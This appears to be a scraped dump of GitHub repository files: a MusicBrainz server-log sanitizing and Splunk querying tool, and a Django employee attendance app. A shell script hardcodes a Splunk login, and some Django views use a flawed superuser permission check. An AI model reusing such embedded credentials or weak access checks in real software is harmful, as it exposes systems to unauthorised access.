Exception(\"\\nplatform:{$_GET['platform']}\\tcmd:{$_GET['cmd']}\\nHandling invalid $msg\\n\");\n}\n\n?>\n" } ]
num_files: 7

repo_name: metabrainz/musicbrainz-server-log-analysis
repo_url: https://github.com/metabrainz/musicbrainz-server-log-analysis
snapshot_id: c469619c448dafe9b34ca89899da5137812fc3b4
revision_id: 726ece0fd9d26afd463aec93b0fade3a8208bd88
directory_id: 85df87bc47957889173e1e1d20743053f20c0bea
branch_name: refs/heads/master
visit_date: 2021-01-10T21:04:25.297236
revision_date: 2012-09-28T17:46:56
committer_date: 2012-09-28T17:46:56
github_id: 4,550,986
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.49238890409469604, "alphanum_fraction": 0.4974220395088196, "avg_line_length": 37.40565872192383, "blob_id": "a77c20fa0bc73fa8ddc3646d3aec3266f21ec2f8", "content_id": "e2730a2c8d0f6c6da397ddab9375073089cd7975", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8146, "license_type": "no_license", "max_line_length": 144, "num_lines": 212, "path": "/querying/run_queries.py", "repo_name": "metabrainz/musicbrainz-server-log-analysis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# Copyright (C) 2012 Daniel Bali\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.\n\nimport psycopg2\nimport sys, utils, json, yaml, config\n\nfrom splunklib.client import connect\nfrom splunklib.binding import HTTPError\n\n# Test mode, and YAML files\nTEST_MODE = False\nQUERIES = 'queries.yml'\nQUERIES_TEST = 'queries_test.yml'\nENTITY_TABLES = 'entity_tables.yml'\n\ndef look_up_mbid_list(mbid_list, mbid_dict, query_template, entity_tables, table_key, cursor):\n for entity_dict in entity_tables['entity_tables']:\n entity = entity_dict.values()[0]\n \n if mbid_list:\n # Look up id in table with the given key (entity or redirect)\n # Look up name in table specified by name_table\n lookup_query = query_template % (entity[table_key], entity['name_table'], \"%s\")\n \n try:\n cursor.execute(lookup_query, (tuple(mbid_list),))\n except Exception, e:\n print \"Query was: %s\" % lookup_query\n print e.pgerror\n sys.exit(1)\n \n # 0: mbid, 1: name\n for record in cursor.fetchall():\n mbid_dict[record[0]] = {\n 'name': record[1],\n 'entity': entity['name']\n }\n mbid_list.remove(record[0])\n\ndef main():\n\n # Parse the YAML file that contains queries\n if TEST_MODE:\n file = open(QUERIES_TEST)\n else:\n file = open(QUERIES)\n queries = yaml.load(file.read())\n \n # Parse YAML file for entity name and redirect tables\n file = open(ENTITY_TABLES)\n entity_tables = yaml.load(file.read())\n \n # Connect to splunk\n try:\n splunk_conn = connect(**config.SPLUNK_CREDENTIALS)\n except HTTPError, e:\n print \"Splunk error: %s\" % str(e.message)\n sys.exit(1)\n \n # Connect to the db\n try:\n db_conn = psycopg2.connect(config.DB_CREDENTIALS)\n db_cursor = db_conn.cursor()\n except psycopg2.OperationalError, e:\n print e\n sys.exit(1)\n \n # Loop through each category\n for category_dict in queries['categories']:\n category = category_dict.values()[0]\n \n # Loop through each query in a category\n for query_dict in category['queries']:\n splunk_query = query_dict.values()[0]\n \n # Get Splunk query response\n try:\n response = splunk_conn.jobs.create(splunk_query['query'], exec_mode='oneshot', output_mode='json', count=0, max_count=5000)\n except HTTPError, e:\n print \"Splunk error: %s\" % str(e.message)\n sys.exit(1)\n \n # Load JSON \n print \"Processing query: %s: %s\" % (category['name'], 
splunk_query['name'])\n try:\n data_json = json.loads(str(response))\n except ValueError, e:\n print \"Warning: no results returned for query '%s'\" % splunk_query['name']\n data_json = [{'message': 'No results found'}]\n \n # Try to find mbids in the response\n mbid_list = []\n for line in data_json:\n if 'mbid' in line:\n mbid_list.append(line['mbid'])\n if mbid_list:\n # Form query to find names for mbids\n entity_query_template = \"\"\"\n select x.gid, x_n.name \n from %s x, %s x_n \n where x.gid in %s \n and x.name = x_n.id;\n \"\"\"\n \n redirect_query_template = \"\"\"\n select x_r.gid, x_n.name \n from %s x_r, %s x_n \n where x_r.gid in %s\n and x_r.new_id = x_n.id\n \"\"\"\n \n # Store name and entity type for mbids\n mbid_dict = {}\n look_up_mbid_list(mbid_list, mbid_dict, entity_query_template, entity_tables, 'entity_table', db_cursor)\n \n # Try to look up tables/ids with redirect tables \n # for mbids that weren't found in \"normal\" tables\n look_up_mbid_list(mbid_list, mbid_dict, redirect_query_template, entity_tables, 'redirect_table', db_cursor)\n \n # Filter data where it's needed\n if splunk_query.has_key('filter'):\n for filter_dict in splunk_query['filter']:\n filter = filter_dict.values()[0]\n data_json = [line for line in data_json if line[filter['column']] not in filter['values']]\n \n for line in data_json:\n \n # Remove \"private\" key-value pairs\n for key in line.keys():\n if key.startswith('_'):\n line.pop(key)\n \n # Correct percent rounding to maximum 2 decimal places\n if 'percent' in line:\n line['percent'] = str(round(float(line['percent']), 2))\n \n # Store names instead of mbids in JSON\n if 'mbid' in line:\n if line['mbid'] in mbid_dict:\n # Create a link to the entity here\n link = '<a href=\"/%s/%s\">%s</a>'\n line['name'] = link % (mbid_dict[line['mbid']]['entity'], line['mbid'], mbid_dict[line['mbid']]['name'].decode('utf-8'))\n else:\n # If name was not found, display the mbid\n line['name'] = '[%s]' % line['mbid']\n # Do not display mbids\n del line['mbid']\n \n # Array containing dumped json data\n data_dict = {} \n \n # If the report is grouped, create multiple reports\n if splunk_query['is_grouped']:\n for line in data_json:\n if (data_dict.has_key(line['urlGroup'])):\n data_dict[line['urlGroup']].append(line)\n else:\n data_dict[line['urlGroup']] = [line]\n del line['urlGroup']\n else:\n data_dict[splunk_query['name']] = data_json\n \n # Create a wrapper for JSON data\n data_wrap = {}\n for key, data in data_dict.iteritems():\n data = {\n 'data' : data, \n 'display' : splunk_query['display']\n }\n data = json.dumps(data)\n data_wrap[key] = data\n \n try:\n for name, data in data_wrap.iteritems():\n # Store results in db, commit\n db_cursor.execute(\"INSERT INTO statistics.log_statistic (name, category, data) VALUES (%s, %s, %s);\",\n (name, category['name'], data))\n \n except Exception, e:\n # Rollback\n db_conn.rollback()\n \n # Print error, return exit code 1\n print e.pgerror\n sys.exit(1)\n \n # Close connection\n db_conn.commit()\n db_cursor.close()\n db_conn.close()\n \n # Exit code 0\n sys.exit(0)\n \n\nif __name__ == '__main__':\n main()\n " }, { "alpha_fraction": 0.5529200434684753, "alphanum_fraction": 0.6462029218673706, "avg_line_length": 58.03529357910156, "blob_id": "af8917ca46c19359dd17cff89614e266a454c87c", "content_id": "5dcd232c58b9ab95169852c31ac6737dfc77cfea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5017, "license_type": "no_license", "max_line_length": 703, 
"num_lines": 85, "path": "/sanitizing/log_sanitizer_test.py", "repo_name": "metabrainz/musicbrainz-server-log-analysis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# Copyright (C) 2012 Daniel Bali\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.\n\nimport random\nimport unittest\nfrom StringIO import StringIO\nfrom string import Template\n\nclass TestSanitizer(unittest.TestCase):\n # List of input data to use for testing\n input_list = []\n\n def setUp(self):\n # Create input data templates\n template = {\n 'username' : [\n Template(\"\"\"1000000000.000 127.0.0.1 \"GET /user/${username}/edits/open?page=1 HTTP/1.1\" 200 9202 z=- up=10.1.1.20:80 ms=2.956 ums=2.956 ol=- h=musicbrainz.org \"\"\"),\n Template(\"\"\"1000000000.000 127.0.0.1 \"GET /search/edits?auto_edit_filter=&order=asc&negation=0&combinator=and&conditions.0.field=vote&conditions.0.operator=%3D&conditions.0.voter_id=1234567890&conditions.0.args=no&conditions.1.field=artist&conditions.1.operator=subscribed&conditions.1.name=&conditions.1.=&conditions.1.args.0=&conditions.1.user_id=1234567890&conditions.2.field=status&conditions.2.operator=%3D&conditions.2.args=1&conditions.3.field=editor&conditions.3.operator=!%3D&conditions.3.name=${username}&conditions.3.=&conditions.3.args.0=1234567890&field=Please+choose+a+condition HTTP/1.1\" 200 35410 z=9.25 up=10.1.1.17:80 ms=8.376 ums=8.220 ol=- h=musicbrainz.org \"\"\")\n ],\n 'userid' : [\n Template(\"\"\"1000000000.000 127.0.0.1 \"GET /show/user/?userid=${userid} HTTP/1.0\" 404 10880 z=- up=10.1.1.23:80 ms=0.793 ums=0.793 ol=- h=musicbrainz.org \"\"\"),\n Template(\"\"\"1000000000.000 127.0.0.1 \"GET /mod/search/pre/voted.html?userid=${userid} HTTP/1.0\" 404 10906 z=- up=10.1.1.17:80 ms=0.859 ums=0.859 ol=- h=musicbrainz.org \"\"\"),\n Template(\"\"\"1000000000.000 127.0.0.1 \"GET /verify-email?email=not_a_real_email%40not_a_real_website.com&chk=0&time=0&userid=${userid} HTTP/1.1\" 200 2949 z=4.02 up=10.1.1.23:80 ms=0.810 ums=0.810 ol=- h=musicbrainz.org \"\"\"),\n Template(\"\"\"1000000000.000 127.0.0.1 \"GET /search/edits?auto_edit_filter=&order=asc&negation=0&combinator=and&conditions.0.field=vote&conditions.0.operator=%3D&conditions.0.voter_id=${userid}&conditions.0.args=no&conditions.1.field=artist&conditions.1.operator=subscribed&conditions.1.name=&conditions.1.=&conditions.1.args.0=&conditions.1.user_id=${userid}&conditions.2.field=status&conditions.2.operator=%3D&conditions.2.args=1&conditions.3.field=editor&conditions.3.operator=!%3D&conditions.3.name=not_a_real_username&conditions.3.=&conditions.3.args.0=${userid}&field=Please+choose+a+condition HTTP/1.1\" 200 35410 z=9.25 up=10.1.1.17:80 ms=8.376 ums=8.220 ol=- h=musicbrainz.org \"\"\")\n ],\n 'email' : [\n Template(\"\"\"1000000000.000 127.0.0.1 \"GET /verify-email?email=${email}&chk=0&time=0&userid=1234567890 HTTP/1.1\" 200 2949 z=4.02 up=10.1.1.23:80 ms=0.810 ums=0.810 
ol=- h=musicbrainz.org \"\"\")\n ]\n }\n\n # Define sample data\n sample_data = {\n 'username' : ['bob123', 'alice456', '%3cplaintext%3e'],\n 'userid' : ['012345', '456789', '789abc'],\n 'email' : ['lorem%40ipsum.com', 'dolor%40sit.co.uk', 'amet%40consectetuer.museum']\n }\n\n # Populate input data list using templates and sample data\n # Store the sensitive part for each case to make assertion easier\n for k, v in template.iteritems():\n for i in range(100):\n tpl = random.choice(v)\n tpl_data = random.choice(sample_data[k])\n input_dict = {\n 'line' : tpl.substitute({k : tpl_data}),\n 'sensitive' : tpl_data}\n self.input_list.append(input_dict)\n\n # Log sanitizer test\n def test_sanitizer(self):\n import log_sanitizer\n\n for i in range(len(self.input_list)):\n # stdin, containing 1 line of input\n stdin = StringIO(self.input_list[i]['line'])\n\n # stdout for log_sanitizer.main()\n stdout = StringIO()\n\n # Sanitize test data\n log_sanitizer.main(stdin=stdin, stdout=stdout)\n\n # Get output\n output = stdout.getvalue().strip()\n\n # Check whether sensitive data was replaced\n self.assertEqual(output.find(self.input_list[i]['sensitive']), -1)\n\nif __name__ == '__main__':\n unittest.main()" }, { "alpha_fraction": 0.7158836722373962, "alphanum_fraction": 0.718120813369751, "avg_line_length": 40.9375, "blob_id": "5939d6eea6c5cbf081b78c42967cd9518846426a", "content_id": "c4302495aebf92130b51293317efca4f59ef9bc4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1341, "license_type": "no_license", "max_line_length": 178, "num_lines": 32, "path": "/README.md", "repo_name": "metabrainz/musicbrainz-server-log-analysis", "src_encoding": "UTF-8", "text": "MusicBrainz-server-log-analysis\n A repository for my Google Summer of Code project. A short description for each important file follows:\n\nadmin/\n\n bin/push_to_splunk.sh\n Shell script, that pushes sanitized logs to splunk. Written by Robert Kaye.\n \nquerying/\n\n config_default.py\n Default configurations/credentials for the database and splunk.\n \n entity_tables.yml\n YAML file that stores entity (artist, release-group, etc.) table names, the corresponding name tables, and redirect tables.\n \n queries.yml\n YAML file that stores queries to run on Splunk, with additional metadata, that we use for processing and display\n \n queries_test.yml\n The same as the queries file, except the queries are limited to a very small subset of data, so the querying runs much faster. This is used for testing purposes.\n \n run_queries.py\n The actual querying script. It parses the YAML file that stores queries, then runs them on the Splunk server. After processing the results, it stores them in the database\n\nsanitizing/\n\n log_sanitizer.py\n Sanitizes logs, changing any IP addresses or sensitive data. 
The sensitive parts are hashed with SHA-1, then converted to base64 for brevity.\n\n log_sanitizer_test.py\n Tests the results of log_sanitizer.py" }, { "alpha_fraction": 0.5252016186714172, "alphanum_fraction": 0.5347782373428345, "avg_line_length": 32.62711715698242, "blob_id": "8e7acb9d635470147afc858fe0bc9552c920a849", "content_id": "856fee98d73e0efa11be1aba4d64e4c96ef7af6a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3968, "license_type": "no_license", "max_line_length": 91, "num_lines": 118, "path": "/sanitizing/log_sanitizer.py", "repo_name": "metabrainz/musicbrainz-server-log-analysis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# Copyright (C) 2012 Daniel Bali\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.\n\nimport sys, getopt, re, hashlib, base64\nfrom salts import salt\n\n# List containing dicts of regexes that find sensitive data, \n# and field names that refer to regex fields and salts\nregex = [{'exp': '/user/(?P<username>[^\\? /]+)', \n 'field' : 'username'},\n {'exp': '(\\?|&)email=(?P<email>[^ &]+)', \n 'field' : 'email'},\n\t\t # In one special case the verify-email line is embedded in a /login?uri=... 
line\n\t\t # This means that special characters are URL encoded, and we need to match them that way\n {'exp': '(%3F|%3f|%26)email(%3D|%3d)(?P<email>[^ %]+%40[^%]+)', \n 'field' : 'email'},\t\t \n {'exp': '(\\?|&)userid=(?P<userid>\\d+)', \n 'field' : 'userid'},\n\t\t # This is also for the special case\n {'exp': '(%3F|%3f|%26)userid(%3D|%3d)(?P<userid>\\d+)', \n 'field' : 'userid'},\t\t \n {'exp': '(\\?|&)conditions\\.(\\d)+\\.user_id=(?P<userid>\\d+)', \n 'field' : 'userid'},\n {'exp': '(\\?|&)conditions\\.(\\d)+\\.name=(?P<username>[^ /]+)',\n 'field' : 'username'},\n {'exp': '(\\?|&)conditions\\.(\\d)+\\.voter_id=(?P<userid>\\d+)',\n 'field' : 'userid'},\n {'exp': '(\\?|&)conditions\\.(\\d)+\\.args\\.(\\d)+=(?P<userid>\\d+)',\n 'field' : 'userid'}]\n\t\t \nhash_memo = {}\ndef hash(salt, value):\n global hash_memo\n key = salt + value\n if key not in hash_memo:\n hash_memo[key] = do_hash(key)\n return hash_memo[key]\n\ndef do_hash(key):\n return base64.urlsafe_b64encode(hashlib.sha1(key).digest())\n\n# Replace function for re.sub()\n# Takes the named group for the given field\n# Replaces the value with a hash\ndef replace(field):\n def replace_string(matchobj):\n new_hash = hash(salt[field], matchobj.group(field))\n return matchobj.group(0).replace(matchobj.group(field), new_hash)\n return replace_string\n\ndef main(stdin=sys.stdin, stdout=sys.stdout, stderr=sys.stderr):\n # Compile regexes\n for r in regex:\n r['exp'] = re.compile(r['exp'])\n\n # Read input\n for line in stdin:\n # Split line to parts.\n try:\n [\n timestamp,\n ip,\n http_method,\n url,\n http_version,\n http_response,\n page_size,\n z,\n up,\n ms,\n ums,\n ol,\n h\n ] = line.strip().split()\n except ValueError, e:\n sys.stderr(line + \"\\n\")\n\t sys.exit(-1)\n \n # Hash IP\n ip_hash = hash(salt['ip'], ip)\n\n # Match regexes\n for r in regex:\n # Replace the current field's value\n url = r['exp'].sub(replace(r['field']), url)\n\n # Print line\n # Remove some fields that we don't need to decrease size\n # Extra quote needed, because http_version (HTTP/1.1\") was removed\n new_line = '%s %s %s %s\" %s %s %s %s\\n' % (\n timestamp,\n ip_hash,\n http_method,\n url,\n http_response,\n page_size,\n z,\n ums\n )\n stdout.write(new_line)\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.7179487347602844, "alphanum_fraction": 0.7179487347602844, "avg_line_length": 23.14285659790039, "blob_id": "91af8e134b4808a41e8fea8bd9d0c306f6d10466", "content_id": "4099209f570ff35152e14c9b9f2be19d9cb9bd60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 507, "license_type": "no_license", "max_line_length": 75, "num_lines": 21, "path": "/admin/bin/sanitize_and_index.sh", "repo_name": "metabrainz/musicbrainz-server-log-analysis", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nINCOMING=~/incoming/*/*\nSANITIZE=~/musicbrainz-server-log-analysis/sanitizing/log_sanitizer.py\nTMP_DIR=/tmp/logs\nSPLUNK=/usr/local/splunk/bin/splunk\n\nmkdir -p $TMP_DIR\n\nfor FILE in `ls $INCOMING`\ndo\n\techo `date`: Sanitizing $FILE\n\tTMP_FILE=$TMP_DIR'/'musicbrainz-access-`date +%Y%m%d`'.log'\n\tpython $SANITIZE < $FILE > $TMP_FILE\n\techo `date`: Importing $FILE to splunk\n\t$SPLUNK add oneshot $TMP_FILE -sourcetype nginx_log -auth import:logloglog\n\trm -f $TMP_FILE\n\trm -f $FILE\ndone\n\nrmdir $TMP_DIR\n" }, { "alpha_fraction": 0.6677908897399902, "alphanum_fraction": 0.6913996338844299, "avg_line_length": 27.238094329833984, "blob_id": "a7233831f20674b6a7dda3dc62bdad4cc0837623", 
"content_id": "134e907c9e1a5c92bb0fa53ba77273718da838c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 593, "license_type": "no_license", "max_line_length": 76, "num_lines": 21, "path": "/querying/config.default.py", "repo_name": "metabrainz/musicbrainz-server-log-analysis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# Database connection details\ndb_host = '127.0.0.1'\ndb_port = 5432\ndb_name = 'musicbrainz_db'\ndb_user = 'musicbrainz'\ndb_password = 'musicbrainz'\n\ndb_template = \"host=%s port=%s dbname=%s user=%s\"\nDB_CREDENTIALS = db_template % (db_host, db_port, db_name, db_user)\n\n# Splunk connection credentials\nsplunk_username = 'user'\nsplunk_password = 'password'\nsplunk_host = 'localhost'\nsplunk_scheme = 'https'\nsplunk_port = 8089\n\nSPLUNK_CREDENTIALS = {'username' : splunk_username, 'password' : splunk_password,\n 'host' : splunk_host, 'scheme' : splunk_scheme, 'port' : splunk_port}\n" }, { "alpha_fraction": 0.6910112500190735, "alphanum_fraction": 0.6910112500190735, "avg_line_length": 16.799999237060547, "blob_id": "b43f0bdf0ab5a9fa3c36f6dc245b2d21ce2084c5", "content_id": "97a027f2029f2baa33b46ed3351be4eda821e2ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 178, "license_type": "no_license", "max_line_length": 69, "num_lines": 10, "path": "/admin/bin/push_to_splunk.sh", "repo_name": "metabrainz/musicbrainz-server-log-analysis", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nHOSTNAME=`hostname`\nSRC=/var/log/nginx/archive/musicbrainz-full-access.log-`date +%Y%m%d`\nDEST=logs@pino.mb:incoming/$HOSTNAME\n\nif [ -e $SRC ]\nthen\n\trsync -z $SRC $DEST\nfi\n" } ]
num_files: 7

repo_name: heerapp/first
repo_url: https://github.com/heerapp/first
snapshot_id: c6401edf482459700c0688a7b2700056cc56d74c
revision_id: 66d0709dcca3961f9fd623b6a925160dea51bc6e
directory_id: 211e24d9a018abf0dd08e68fbd91d2fe3add7d50
branch_name: refs/heads/master
visit_date: 2022-07-12T09:46:50.398742
revision_date: 2019-10-01T10:12:08
committer_date: 2019-10-01T10:12:08
github_id: 141,520,531
star_events_count: 1
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.6293007731437683, "alphanum_fraction": 0.6304106712341309, "avg_line_length": 20.380952835083008, "blob_id": "98bf02e6b5a7bd77b8fb0d8e5760430ba0e936c0", "content_id": "7e51c1cdcb4bf87cd01da457cf849cc8bb2f6933", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 901, "license_type": "no_license", "max_line_length": 67, "num_lines": 42, "path": "/main/forms.py", "repo_name": "heerapp/first", "src_encoding": "UTF-8", "text": "from django import forms\nfrom django.contrib.auth.forms import User\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .models import *\n\n\nclass UserRegisterForm(UserCreationForm):\n email = forms.EmailField\n\n class Meta:\n model = User\n fields = ['username', 'email', 'password1', 'password2']\n\n\nclass UserUpdateForm(forms.ModelForm):\n class Meta:\n model = User\n fields = ['username', 'email']\n\n\nclass EmployeeUpdateForm(forms.ModelForm):\n class Meta:\n model = Employee\n fields = ['address', 'contact', 'type', 'image']\n\n\nclass EntryForm(forms.ModelForm):\n class Meta:\n model = Entry\n exclude = ('user',)\n\n\nclass ExitForm(forms.ModelForm):\n class Meta:\n model = Exit\n exclude = ('user', 'status',)\n\n\nclass LeaveForm(forms.ModelForm):\n class Meta:\n model = Leave\n exclude = ('user',)\n\n\n\n" }, { "alpha_fraction": 0.566439151763916, "alphanum_fraction": 0.5776796340942383, "avg_line_length": 44.29090881347656, "blob_id": "7a922e937bd33415a1b369c26ff3388b81719742", "content_id": "ee3c3605e5d9c427f10c8ed4eb676ed32a27cdfb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2491, "license_type": "no_license", "max_line_length": 185, "num_lines": 55, "path": "/main/migrations/0001_initial.py", "repo_name": "heerapp/first", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.4 on 2019-10-01 08:18\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Leave',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('date', models.DateField()),\n ('reason', models.TextField()),\n ('status', models.CharField(blank=True, default='pending...', max_length=50)),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Exit',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('end_time', models.DateTimeField(auto_now_add=True)),\n ('status', models.CharField(default='Full Day', max_length=50)),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Entry',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('start_time', models.DateTimeField(auto_now_add=True)),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Employee',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('type', models.CharField(choices=[('Web Developer', 
'developer'), ('Receptionist', 'receptionist'), ('Manager', 'manager'), ('Designer', 'designer')], max_length=100)),\n ('address', models.CharField(max_length=200)),\n ('contact', models.CharField(max_length=200)),\n ('image', models.ImageField(upload_to='media/')),\n ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.6790757179260254, "alphanum_fraction": 0.6874197721481323, "avg_line_length": 27.740739822387695, "blob_id": "9b1d314c44abef163ccef06377198827a1a6b05b", "content_id": "fe6352cab05e10f0943dc0ee92afa1aafd737cf3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1558, "license_type": "no_license", "max_line_length": 78, "num_lines": 54, "path": "/main/models.py", "repo_name": "heerapp/first", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom datetime import datetime\nfrom django.db.models.signals import post_save\n\nSTAFF_CHOICES = [\n ('Web Developer', 'developer'),\n ('Receptionist', 'receptionist'),\n ('Manager', 'manager'),\n ('Designer', 'designer'),\n]\n\n\nclass Employee(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n type = models.CharField(max_length=100, choices=STAFF_CHOICES)\n address = models.CharField(max_length=200)\n contact = models.CharField(max_length=200)\n image = models.ImageField(upload_to=\"media/\")\n\n\ndef create_employee(sender, **kwargs):\n if kwargs['created']:\n Employee.objects.create(user=kwargs['instance'])\n\n\npost_save.connect(create_employee, sender=User)\n\n\nclass Entry(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n start_time = models.DateTimeField(auto_now_add=True, blank=True)\n\n def __str__(self):\n return self.user\n\n\nclass Exit(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n end_time = models.DateTimeField(auto_now_add=True, blank=True)\n status = models.CharField(max_length=50, default=\"Full Day\")\n\n def __str__(self):\n return f\"{self.user}\"\n\n\nclass Leave(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n date = models.DateField()\n reason = models.TextField()\n status = models.CharField(max_length=50, default=\"pending...\", blank=True)\n\n def __str__(self):\n return f\"{self.user}\"\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6366336345672607, "alphanum_fraction": 0.6366336345672607, "avg_line_length": 44.90909194946289, "blob_id": "9ac3073ad0971417ff5ff774ca5f8a767457e951", "content_id": "084259c915e99a1ac62683962ba4af044106039b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1010, "license_type": "no_license", "max_line_length": 75, "num_lines": 22, "path": "/main/urls.py", "repo_name": "heerapp/first", "src_encoding": "UTF-8", "text": "\nfrom django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index,name='index'),\n path('home/', views.home,name='home'),\n path('employ/acer/', views.home, name='home'),\n path('create/', views.create, name='create'),\n path('employee/<slug:name>/', views.employ, name='detail'),\n path('employee/', views.employee, name='employee'),\n path('leave/', views.leave, name='leave'),\n path('entry/', views.entry, name='entry'),\n path('exit/', views.exit, name='exit'),\n path('details/<slug:user>/', views.attendance, name='attendance'),\n path('grant/<int:pk>/', views.grant, name='grant'),\n path('reject/<int:pk>/', views.reject, name='reject'),\n path('profile/', views.profile, name='profile'),\n path('attendance/', views.all_attendence, name='attendances'),\n path('leaves/', views.all_leave, name='leaves'),\n path('employee/<slug:user>/leaves/', views.leaves, name='user-leaves'),\n path('employ/<slug:name>/', views.profiles, name='employs'),\n]" }, { "alpha_fraction": 0.8072289228439331, "alphanum_fraction": 0.8072289228439331, "avg_line_length": 22.714284896850586, "blob_id": "ddaa2a45c7589f5c993ebb21b7c0b3c257e0cfef", "content_id": "6fe4aef3755d334a58e2bbc15d5586b4af0bab17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 166, "license_type": "no_license", "max_line_length": 32, "num_lines": 7, "path": "/main/admin.py", "repo_name": "heerapp/first", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import *\n\nadmin.site.register(Employee)\nadmin.site.register(Entry)\nadmin.site.register(Exit)\nadmin.site.register(Leave)\n" }, { "alpha_fraction": 0.6191035509109497, "alphanum_fraction": 0.6214523315429688, "avg_line_length": 26.154254913330078, "blob_id": "26fceb2dcdfb976fa63141fe51d2d04c2b38339b", "content_id": "fe7fcc60764396cf04bb4766112de75422d19c51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5109, "license_type": "no_license", "max_line_length": 96, "num_lines": 188, "path": "/main/views.py", "repo_name": "heerapp/first", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect, get_object_or_404,HttpResponseRedirect,reverse\nfrom django.contrib import auth\nfrom django.contrib.auth.decorators import permission_required,login_required\nfrom .forms import *\n\n\n\ndef index(request):\n employee = Employee.objects.all()\n return render(request, 'main/index.html', {'employee': employee})\n\n\n@permission_required('is_superuser', raise_exception=True)\ndef home(request):\n leave = Leave.objects.all().filter(status= 'pending...')\n entry = Entry.objects.all().filter(start_time__date__day=datetime.now().day)\n exit = Exit.objects.all().filter(end_time__date__day=datetime.now().day)\n count = Employee.objects.all().count()\n present = entry.count()\n absent = count - present\n\n context = {\n 'leave': leave,\n 'entry': entry,\n 'exit': exit,\n 'count': count,\n 'present': present,\n 'absent': absent,\n }\n return render(request, 'main/home.html', context)\n\n\n@permission_required('is_superuser', 